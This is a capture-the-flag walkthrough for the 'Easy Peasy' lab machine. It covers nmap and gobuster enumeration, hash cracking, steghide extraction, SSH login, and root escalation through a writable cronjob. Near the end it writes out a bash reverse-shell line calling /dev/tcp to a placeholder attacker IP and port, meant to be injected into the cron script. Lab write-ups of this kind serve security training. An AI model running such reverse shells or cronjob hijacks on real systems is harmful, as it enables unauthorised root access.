Easy Peasy
This is a free room created by kral4. The room looks to test one’s basic skills in using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.
For this task, part of the code used for Task 2 has been provided for at the end.
Task 1 - Enumerate with nmap
Enumerate the machine and answer the following questions:
- How many ports are open?
- What is the version of nginx?
- What is running on the highest port?
# Set IP of victim machine.
> victim=10.10.155.79
# Use rustscan to discover ports and pass into nmap for service and version detection
> rustscan -a $victim -r 1-65535 -- -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
\U0001f635 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.155.79:80
Open 10.10.155.79:6498
Open 10.10.155.79:65524
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 19:09 UTC
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 19:09
Scanning 10.10.155.79 [2 ports]
Completed Ping Scan at 19:09, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:09
Completed Parallel DNS resolution of 1 host. at 19:09, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:09
Scanning ip-10-10-155-79.eu-west-1.compute.internal (10.10.155.79) [3 ports]
Discovered open port 65524/tcp on 10.10.155.79
Discovered open port 80/tcp on 10.10.155.79
Discovered open port 6498/tcp on 10.10.155.79
Completed Connect Scan at 19:09, 0.00s elapsed (3 total ports)
Initiating Service scan at 19:09
Scanning 3 services on ip-10-10-155-79.eu-west-1.compute.internal (10.10.155.79)
Completed Service scan at 19:09, 11.03s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.155.79.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:09
Completed NSE at 19:09, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:09
Completed NSE at 19:09, 0.00s elapsed
Nmap scan report for ip-10-10-155-79.eu-west-1.compute.internal (10.10.155.79)
Host is up, received syn-ack (0.00058s latency).
Scanned at 2021-05-10 19:09:30 UTC for 12s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack nginx 1.16.1
6498/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open http syn-ack Apache httpd 2.4.43 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.28 seconds
Task 2 - Compromising the machine
Starting with the nginx web server, we discovered a robots.txt file that didn’t give us any additional information about the website. We can proceed to do enumerate the site with gobuster and discover a hidden folder.
A second enumeration with this folder enables us to discover a second folder that we can navigate to using curl or checking the page source in a browser enables us to find a base64 key. Decoding this key then gives us the first flag.
> curl http://$victim/robots.txt
User-Agent:*
Disallow:/
Robots Not Allowed
# 1st enumeration with gobuster.
> gobuster dir -u http://$victim -w /usr/share/wordlists/dirb/big.txt -t 60
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.250.37
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/11 16:25:04 Starting gobuster in directory enumeration mode
===============================================================
/hidden (Status: 301) [Size: 169] [--> http://10.10.250.37/hidden/]
/robots.txt (Status: 200) [Size: 43]
===============================================================
2021/05/11 16:26:13 Finished
===============================================================
# 2nd enumeration with gobuster and the hidden folder.
> gobuster dir -u http://$victim/hidden -w /usr/share/wordlists/dirb/big.txt -t 60
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.250.37/hidden
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/11 16:32:49 Starting gobuster in directory enumeration mode
===============================================================
/whatever (Status: 301) [Size: 169] [--> http://10.10.250.37/hidden/whatever/]
===============================================================
2021/05/11 16:33:53 Finished
===============================================================
# One liner to find and decode the base64 text
> curl -L http://$victim/hidden/whatever | grep "hidden" | cut -d ">" -f2 | cut -d "<" -f1 | base64 -d
1. Using Gobuster, find flag 1.
Decode the base64 text that is found in a subdirectory of a hidden folder in the nginx service.
Moving on to the Apache web server, we determined that there exists a robots.txt file at the root that informs us that the web server is expecting a user agent with a particular ID. As this looks like an MD5 hash, we can attempt to de-hash it using MD5hasing.net. This gives us the second flag.
2.Further enumerate the machine, what is flag 2?
Use the online tool to crack the hash.
Going back to our web server, if we nagivate to the website using the server’s IP and port, we get shown a standard Apache landing page. However, altering the request with the User-Agent discovered previously will enable us see a new page with additional information, namely:
- A base62 encoded string at the top of the page source that can be decoded using CodeChef.
- Flag 3.
3.Crack the hash with easypeasy.txt, What is the flag 3?
This is actually in error. You can just scan the page source for flag 3 without the need to crack the hash.
Decoding the encoded string reveals the hidden directory which if we navigate into (remember to maintain the User Agent settings in your tool of choice), we should be able to view a hashed string in the page source.
4.What is the hidden directory?
Use your favourite tool to decode the base62 encoded string.
We can use the downloaded Task File that we got at the start of this Task as a key dictionary to crack the hash.
5. Using the wordlist that provided to you in this task crack the hash what is the password?
Use the downloaded Task File with your favourite cracking tool to crack the hash. Hash uses the GOST Hashing Algorithm.
One would also notice an image file that can be examined for other hidden clues. A conversion of the binary text to ASCII text doesn’t give anything useful. However, by examining it for any hidden information shows that there is a hidden text file embedded within the image. Extracting this hidden text file will reveal to us a username and binary password that can be converted to ascii.
6. What is the password to login to the machine via SSH?
Use a binary to ASCII converter on the password in the text file to reveal the password.
Using the username from the text file and the password from the binary conversion, we can ssh into the server. Refer to the initial scan that we performed to identify the correct SSH port. We will be dropped into boring’s home directory where we will have to decode the flag in user.txt using a ROT13.
7. What is the user flag?
Perform a ROT13 on the flag in the user.txt file.
We can upload linpeas.sh to this machine to help us identify potential vulnerabilities we can exploit. From its output, we recognize that there is a file within /var/www that runs on a cronjob. Inserting a reverse shell command into this file and setting up a listener to our attacking machine will enable us achieve a new shell on the victim but with root privileges. We can then proceed to find root flag to complete the room.
8. What is the root flag?
Examine the contents in the /root/.root.txt file.
# Acquiring the user agent
> curl http://$victim:65524/robots.txt
User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a18672860d0510e5ab6699730763b250
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions
# Extracting the encoded text at the top of the page
> curl -H "User-Agent: a18672860d0510e5ab6699730763b250" http://$victim:65524/ | egrep "hidden" | cut -d ":" -f2 | cut -d "<" -f1
# Extracting the flag within the source
> curl -H "User-Agent: a18672860d0510e5ab6699730763b250" http://$victim:65524/ | egrep "flag\{" | cut -d ":" -f2
# Acquiring the hash from the hidden directory
> curl -L -H "User-Agent: a18672860d0510e5ab6699730763b250" http://$victim:65524/n0th1ng3ls3m4tt3r | grep -oP '<p>\K.*(?=</p>)'
# Cracking hash using wordlist from start of Task 2
> hashcat -m 6900 -a 0 [Hash from hidden directory here] easypeasyfiles.txt
# Examining the image (index.jpg) for any hidden files
> steghide info index.jpg
"index.jpeg":
format: jpeg
capacity: 4.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "secrettext.txt":
size: 278.0 Byte
encrypted: no
compressed: no
# Extracting secrettext.txt from image
> steghide extract -sf index.jpg
steghide extract -sf index.jpeg
Enter passphrase:
wrote extracted data to "secrettext.txt".
# Convert binary password to ascii
> cat secrettext.txt | tail -n 1 | ascii2binary -b b
# Login and perform a ROT13 on the encoded flag.
> cat user.txt | tr '[a-zA-Z]' '[n-za-m][N-ZA-M]'
# Insert a reverse shell into the /var/www/.mysecretcronjob.sh
> echo "bash -c 'exec bash -i &>/dev/tcp/[ATTACKER IP]/[ATTACKER PORT] <&1'"
# You can then set up a reverse shell listener and gain a root shell to the victim machine.
# Proceed to navigate to the root directory
> ls -la | grep "txt"
-rw-r--r-- 1 root root 39 Jun 15 2020 .root.txt